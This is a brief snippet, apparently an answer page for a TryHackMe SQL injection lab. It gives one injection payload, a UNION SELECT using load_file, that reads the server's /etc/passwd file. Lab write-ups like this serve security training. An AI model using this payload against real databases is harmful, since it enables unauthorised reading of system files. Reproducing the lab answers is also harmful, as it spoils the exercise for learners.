Tryhackme Sql Injection Lab Answers «2027» Using SQL injection, we inject the following query: 1' UNION SELECT load_file('/etc/passwd') -- . This query will extract the contents of the /etc/passwd file.